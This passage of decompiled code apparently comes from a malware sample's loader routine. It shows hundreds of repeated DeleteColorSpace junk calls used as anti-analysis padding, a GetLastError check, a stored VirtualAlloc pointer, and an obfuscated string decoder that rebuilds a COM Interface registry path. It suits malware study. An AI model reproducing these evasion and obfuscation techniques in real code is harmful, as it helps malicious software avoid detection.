				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				RealizePalette(0x101c);
				_v20 = GetLastError;
				if(_v20() != 6) {
					return 0;
				}
				_v28 = GetModuleHandleA;
				 *0x10035664 = VirtualAlloc;
				 *0x1003560c = _v28(0);
				_v24 = RegOpenKeyW;
				 *_v12 = 0x101;
				 *_v12 = ( *_v12 & 0x0000ffff) - 0xb8;
				_v12[2] = 0x126;
				_t13 =  &(_v12[2]); // 0x74006e
				_v12[2] = ( *_t13 & 0x0000ffff) - 0xb8;
				_v12[4] = 0x12c;
				_t19 =  &(_v12[4]); // 0x650074
				_v12[4] = ( *_t19 & 0x0000ffff) - 0xb8;
				_v12[6] = 0x11d;
				_t25 =  &(_v12[6]); // 0x720065
				_v12[6] = ( *_t25 & 0x0000ffff) - 0xb8;
				_v12[8] = 0x12a;
				_t31 =  &(_v12[8]); // 0x660072
				_v12[8] = ( *_t31 & 0x0000ffff) - 0xb8;
				_v12[0xa] = 0x11e;
				_t37 =  &(_v12[0xa]); // 0x610066
				_v12[0xa] = ( *_t37 & 0x0000ffff) - 0xb8;
				_v12[0xc] = 0x119;
				_t43 =  &(_v12[0xc]); // 0x630061
				_v12[0xc] = ( *_t43 & 0x0000ffff) - 0xb8;
				_v12[0xe] = 0x11b;
				_t49 =  &(_v12[0xe]); // 0x650063
				_v12[0xe] = ( *_t49 & 0x0000ffff) - 0xb8;
				_v12[0x10] = 0x11d;
				_t55 =  &(_v12[0x10]); // 0x5c0065
				_v12[0x10] = ( *_t55 & 0x0000ffff) - 0xb8;
				_v12[0x12] = 0x114;
				_t61 =  &(_v12[0x12]); // 0x7b005c
				_v12[0x12] = ( *_t61 & 0x0000ffff) - 0xb8;
				_v12[0x14] = 0x133;
				_t67 =  &(_v12[0x14]); // 0x62007b
				_v12[0x14] = ( *_t67 & 0x0000ffff) - 0xb8;
				_v12[0x16] = 0x11a;
				_t73 =  &(_v12[0x16]); // 0x310062
				_v12[0x16] = ( *_t73 & 0x0000ffff) - 0xb8;
				_v12[0x18] = 0xe9;
				_t79 =  &(_v12[0x18]); // 0x390031
				_v12[0x18] = ( *_t79 & 0x0000ffff) - 0xb8;
				_v12[0x1a] = 0xf1;
				_t85 =  &(_v12[0x1a]); // 0x360039
				_v12[0x1a] = ( *_t85 & 0x0000ffff) - 0xb8;
				_v12[0x1c] = 0xee;
				_t91 =  &(_v12[0x1c]); // 0x620036
				_v12[0x1c] = ( *_t91 & 0x0000ffff) - 0xb8;
				_v12[0x1e] = 0x11a;
				_t97 =  &(_v12[0x1e]); // 0x320062
				_v12[0x1e] = ( *_t97 & 0x0000ffff) - 0xb8;
				_v12[0x20] = 0xea;
				_t103 =  &(_v12[0x20]); // 0x380032
				_v12[0x20] = ( *_t103 & 0x0000ffff) - 0xb8;
				_v12[0x22] = 0xf0;
				_t109 =  &(_v12[0x22]); // 0x370038
				_v12[0x22] = ( *_t109 & 0x0000ffff) - 0xb8;
				_v12[0x24] = 0xef;
				_t115 =  &(_v12[0x24]); // 0x2d0037
				_v12[0x24] = ( *_t115 & 0x0000ffff) - 0xb8;
				_v12[0x26] = 0xe5;
				_t121 =  &(_v12[0x26]); // 0x62002d
				_v12[0x26] = ( *_t121 & 0x0000ffff) - 0xb8;
				_v12[0x28] = 0x11a;
				_t127 =  &(_v12[0x28]); // 0x610062
				_v12[0x28] = ( *_t127 & 0x0000ffff) - 0xb8;
				_v12[0x2a] = 0x119;
				_t133 =  &(_v12[0x2a]); // 0x620061
				_v12[0x2a] = ( *_t133 & 0x0000ffff) - 0xb8;
				_v12[0x2c] = 0x11a;
				_t139 =  &(_v12[0x2c]); // 0x340062
				_v12[0x2c] = ( *_t139 & 0x0000ffff) - 0xb8;
				_v12[0x2e] = 0xec;
				_t145 =  &(_v12[0x2e]); // 0x2d0034
				_v12[0x2e] = ( *_t145 & 0x0000ffff) - 0xb8;
				_v12[0x30] = 0xe5;
				_t151 =  &(_v12[0x30]); // 0x31002d
				_v12[0x30] = ( *_t151 & 0x0000ffff) - 0xb8;
				_v12[0x32] = 0xe9;
				_t157 =  &(_v12[0x32]); // 0x300031
				_v12[0x32] = ( *_t157 & 0x0000ffff) - 0xb8;
				_v12[0x34] = 0xe8;
				_t163 =  &(_v12[0x34]); // 0x310030
				_v12[0x34] = ( *_t163 & 0x0000ffff) - 0xb8;
				_v12[0x36] = 0xe9;
				_t169 =  &(_v12[0x36]); // 0x610031
				_v12[0x36] = ( *_t169 & 0x0000ffff) - 0xb8;
				_v12[0x38] = 0x119;
				_t175 =  &(_v12[0x38]); // 0x2d0061
				_v12[0x38] = ( *_t175 & 0x0000ffff) - 0xb8;
				_v12[0x3a] = 0xe5;
				_t181 =  &(_v12[0x3a]); // 0x62002d
				_v12[0x3a] = ( *_t181 & 0x0000ffff) - 0xb8;
				_v12[0x3c] = 0x11a;
				_t187 =  &(_v12[0x3c]); // 0x360062
				_v12[0x3c] = ( *_t187 & 0x0000ffff) - 0xb8;
				_v12[0x3e] = 0xee;
				_t193 =  &(_v12[0x3e]); // 0x390036
				_v12[0x3e] = ( *_t193 & 0x0000ffff) - 0xb8;
				_v12[0x40] = 0xf1;
				_t199 =  &(_v12[0x40]); // 0x630039
				_v12[0x40] = ( *_t199 & 0x0000ffff) - 0xb8;
				_v12[0x42] = 0x11b;
				_t205 =  &(_v12[0x42]); // 0x2d0063
				_v12[0x42] = ( *_t205 & 0x0000ffff) - 0xb8;
				_v12[0x44] = 0xe5;
				_t211 =  &(_v12[0x44]); // 0x30002d
				_v12[0x44] = ( *_t211 & 0x0000ffff) - 0xb8;
				_v12[0x46] = 0xe8;
				_t217 =  &(_v12[0x46]); // 0x300030
				_v12[0x46] = ( *_t217 & 0x0000ffff) - 0xb8;
				_v12[0x48] = 0xe8;
				_t223 =  &(_v12[0x48]); // 0x610030
				_v12[0x48] = ( *_t223 & 0x0000ffff) - 0xb8;
				_v12[0x4a] = 0x119;
				_t229 =  &(_v12[0x4a]); // 0x610061
				_v12[0x4a] = ( *_t229 & 0x0000ffff) - 0xb8;
				_v12[0x4c] = 0x119;
				_t235 =  &(_v12[0x4c]); // 0x300061
				_v12[0x4c] = ( *_t235 & 0x0000ffff) - 0xb8;
				_v12[0x4e] = 0xe8;
				_t241 =  &(_v12[0x4e]); // 0x300030
				_v12[0x4e] = ( *_t241 & 0x0000ffff) - 0xb8;
				_v12[0x50] = 0xe8;
				_t247 =  &(_v12[0x50]); // 0x330030
				_v12[0x50] = ( *_t247 & 0x0000ffff) - 0xb8;
				_v12[0x52] = 0xeb;
				_t253 =  &(_v12[0x52]); // 0x340033
				_v12[0x52] = ( *_t253 & 0x0000ffff) - 0xb8;
				_v12[0x54] = 0xec;
				_t259 =  &(_v12[0x54]); // 0x310034
				_v12[0x54] = ( *_t259 & 0x0000ffff) - 0xb8;
				_v12[0x56] = 0xe9;
				_t265 =  &(_v12[0x56]); // 0x640031
